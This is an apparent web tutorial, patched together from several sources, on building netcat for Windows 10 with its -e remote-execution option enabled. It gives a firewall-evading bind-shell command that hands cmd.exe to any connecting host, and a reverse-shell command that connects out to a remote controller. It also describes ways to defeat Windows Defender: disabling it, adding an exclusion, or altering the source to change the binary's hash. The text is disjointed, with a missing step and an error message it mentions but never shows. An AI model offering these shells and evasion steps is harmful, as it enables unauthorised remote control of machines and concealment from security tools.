These steps compile an nc.exe (the default output name) on a Windows 10 machine with the “-e” command-line option enabled. In the source, -e is gated behind the GAPING_SECURITY_HOLE compile-time define, and the name is deliberate: -e executes a program and attaches that program's standard input and output to the network connection, so anyone who can reach the socket gets the program; example:
Small update: netcat 1.12 adds a -c command-line option that sends CRLF line endings instead of just CR (e.g. to talk to Exchange SMTP). Warning: a number of antivirus products classify netcat (nc.exe) as harmful, and may block or delete the file when you try to download it.
Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool that instantly provides network connectivity.
Netcat Windows Examples
I discovered that MobaXterm for Windows has the nc (netcat) command, as well as many other Unix commands, like ls, ps, and kill. I wholeheartedly recommend MobaXterm, especially if you are familiar with both Unix and DOS.

Run Netcat listening behind the firewall on port 53, handing cmd.exe to whoever connects (-L is the Windows build's “listen harder” option: it goes back to listening after the client disconnects):

nc -L -p 53 -e cmd.exe

Then from outside the firewall connect to the listening machine:

nc -v xxx.xxx.xxx.xx 53

If you get a command prompt then you are executing commands on the listening machine. Use 'exit' at the command prompt for a clean disconnect. Port 53 is used because DNS is one of the ports most firewalls let through. Note that this listener performs no authentication: anyone who can reach port 53 on that host gets the same cmd.exe, so do not leave it running longer than needed.

Netcat (or nc for short) is a simple yet powerful networking command-line tool used on Linux for almost any operation related to TCP, UDP, or UNIX-domain sockets. Netcat can be used for port scanning, port redirection and as a port listener (for incoming connections); it can also open remote connections, and much more.
To create a reverse shell (the target connects out to you, which gets through firewalls that block inbound connections but allow outbound ones; the remote control machine must already be listening on the chosen port):
nc <remote control machine> <remote control port> -e cmd.exe
The caveat on Windows 10 is that Windows Defender detects nc.exe as malware and deletes it. Be aware that the git repo used here does include a precompiled nc.exe; if Windows Defender is active that file will likely be deleted as soon as it lands on disk, and a freshly compiled nc.exe will likely be deleted too.
Windows Defender Workaround
You have two easy options to get around Windows Defender:
Disable Windows Defender while you use netcat (or add an exclusion for the folder you build and run it from), or
Before you compile, edit a source file. There are numerous places, especially in netcat.c, where status messages (such as the one at line 381) are written to the terminal. If you change such a message and then compile, the hash of the resulting nc.exe changes. Defender's detection of this particular binary appears to be largely hash-based, which is why this works; Defender also uses static and behavioural signatures, though, so a rebuilt binary is not guaranteed to go unnoticed, and the detection is not a false positive: an nc.exe with -e enabled is exactly the remote-shell tool the signature exists for.
4) From the MinGW Installation Manager I needed to select the following packages:
4a) mingw32-developer-toolkit
4b) mingw32-base
4c) mingw32-gcc-g++
4d) mingw32-gcc-objc
4e) msys-base
6) Make sure your PATH variable includes the folder holding the MinGW DLLs.
6a) The default path is:
C:\MinGW\bin
6b) Start > Control Panel > Advanced Settings > Environment Variables
6c) Select “Path” from “User variables for [your user name]”.
6d) Select Edit…
6e) Add the path to the DLL folder (default: C:\MinGW\bin).
6f) Apply the changes and close the Control Panel windows.
6g) Restart Windows, or at least open a new CMD window: a CMD window that was already open keeps the old PATH.
7) Verify that gcc's search paths include the MinGW folder.
7a) Open CMD and type:
gcc -print-search-dirs
7b) Among other things you should see references to /mingw32/bin
8) Still in CMD, navigate to the folder which holds the NetCat source files.
8a) Run makewin.cmd
8b) You may get the following error:
As long as there are no other errors (warnings do not count) you should be fine. The default makewin.cmd script ends by copying the newly compiled nc.exe into your system32 folder, which fails when that folder is protected; that is the error shown. It can be ignored, because the compiled binary is already in the folder you are currently in. Check that nc.exe now exists there and that its help output lists the -e option; in this source the -e line of the help text is only compiled in when GAPING_SECURITY_HOLE is defined, so its presence confirms the build you wanted.
8c) There will be some warnings that look like errors.
Netcat Commands List
You now have a compiled nc.exe that runs on Windows 10 and accepts the -e argument.